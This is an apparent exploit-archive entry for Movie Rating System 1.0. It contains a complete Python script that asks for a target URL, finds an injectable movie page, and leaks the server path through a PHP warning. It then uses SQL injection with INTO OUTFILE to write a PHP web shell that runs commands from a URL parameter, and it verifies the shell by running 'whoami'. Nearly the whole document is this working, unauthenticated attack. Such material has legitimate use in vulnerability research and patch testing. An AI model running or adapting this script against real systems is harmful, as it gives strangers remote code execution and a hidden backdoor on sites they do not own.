Movie Rating System version 1.0 suffers from a remote SQL injection vulnerability that can allow an attacker to escalate to remote code execution.
491fb40d4c23f9004cab9584a482c0e8
# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
# Date: 22/12/2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Ubuntu
# This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads.
import requests
import random
import string
from bs4 import BeautifulSoup
url = input("TARGET = ")
if not url.startswith('http://') and not url.startswith('https://'):
url = "http://" + url
if not url.endswith('/'):
url = url + "/"
payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"
let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))
resp = requests.get(url)
htmlParser = BeautifulSoup(resp.text, 'html.parser')
getMenu = htmlParser.findAll("a", {"class": "nav-link"})
selectPage = ""
for i in getMenu:
if "movie" in i.text.lower():
selectPage = i["href"]
break
selectPage = selectPage.replace("./","")
findSql = url + selectPage
resp = requests.get(findSql)
htmlParser = BeautifulSoup(resp.text, 'html.parser')
movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"})
sqlPage = movieList[0]["href"]
sqlPage = sqlPage.replace("./","")
sqlPage = url + sqlPage
print("\nFinding path")
findPath = requests.get(sqlPage + '\'')
findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")]
findPath = findPath[findPath.index("<b>")+3:len(findPath)]
print("injection page: "+sqlPage)
parser = findPath.split('\\')
parser.pop()
findPath = ""
for find in parser:
findPath += find + "/"
print("\nFound Path : " + findPath)
SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())
print("\n\nShell Uploading...")
status = requests.get(sqlPage+SQLtoRCE)
shellOutput = requests.get(url+shellname+".php?tago=whoami")
print("\n\nShell Output : "+shellOutput.text)
print("\nShell Path : " + url+shellname+".php")